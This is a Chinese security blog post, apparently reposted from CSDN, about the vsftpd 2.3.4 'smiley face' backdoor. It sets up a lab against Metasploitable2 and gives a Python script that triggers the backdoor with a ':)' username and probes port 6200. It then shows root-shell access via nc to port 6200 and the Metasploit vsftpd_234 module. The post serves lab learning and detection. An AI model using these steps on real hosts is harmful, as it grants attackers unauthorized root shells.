python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
2022-9-11 00:5:52 Author: 橘猫学安全(查看原文) 阅读量:20 收藏

vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;

当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。

环境搭建

攻击机(本机):192.168.1.3

靶机(metaspolit2):192.168.1.5

nmap进行漏洞检测

python脚本进行漏洞检测

代码如下:

import socketfrom ftplib import FTP url = input("请输入你需要检测的地址:")ftp = FTP()username = 'root:)' #用户名必须包含:)这两个字符password = 'anonymous' #密码随便啥都行try: ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒 ftp.login(username,password) ftp.quit()except: print("完成登录检测")try: s = socket.socket() #使用socket函数来检测是否有漏洞存在 s.connect((url,6200)) s.close() print("存在微笑漏洞")except: print("没有发现笑脸漏洞!")

输出结果:

(一)使用nc进行漏洞利用

1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个

密码回车等待,紧接着进行下一步:

2、打开一个新窗口,输入nc 目标ip 6200 即可连接。

(二)使用msf进行漏洞利用

  1. 打开MSFConsole搜索vsftpd_234并使用

2. 设置攻击目标,进行exploit即可获取shell。

作者:CSDN博主「xiaochuhe.」

原文链接:https://blog.csdn.net/xiaofengdada/article/details/122693486

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本号及原作者不承担相应的后果.

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247498381&idx=1&sn=d767b254f696213d951e3419c6d8d43c&chksm=c04d7db3f73af4a5074027aebf6cbc646501004d73023cc08a178533603f78cb362b2af1a2b0#rd
如有侵权请联系:admin#unsafe.sh